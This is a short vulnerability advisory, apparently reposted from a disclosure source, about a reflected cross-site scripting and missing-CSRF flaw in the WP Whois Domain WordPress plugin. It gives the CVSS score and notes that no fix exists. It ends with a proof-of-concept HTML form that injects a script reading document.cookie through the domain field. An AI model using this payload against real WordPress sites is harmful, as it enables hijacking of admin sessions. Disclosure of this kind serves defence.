Quantcast
Channel: CodeSection,代码区,网络安全 - CodeSec
Viewing all articles
Browse latest Browse all 12749

WP Whois Domain Reflected XSS

0
0
Homepage

https://wordpress.org/plugins/wp-whois-domain/

Overview

Due to a lack of CSRF mitigation and entity encoding in pages/func-whois.php , it is possible to execute scripts in the context of an admin user by including a script in the domain field, via the query string or a POST field.

CVSS Score

5.5

CVSS Vector

(AV:N/AC:M/Au:N/C:P/I:P/A:N/E:F/RL:U/RC:C)

Versions Affected

All versions

Solution

There is currently no official fix, the plugin has been removed from the WordPress plugin repository until the vendor provides a solution.

Proof of Concept <form action="[url of page with the whois form]" method="post"> <input type="hidden" name="domain" value=""><script>alert(document.cookie)</script>"> <input type="submit" value="Submit"> </form> WPVDB-ID

8683


Viewing all articles
Browse latest Browse all 12749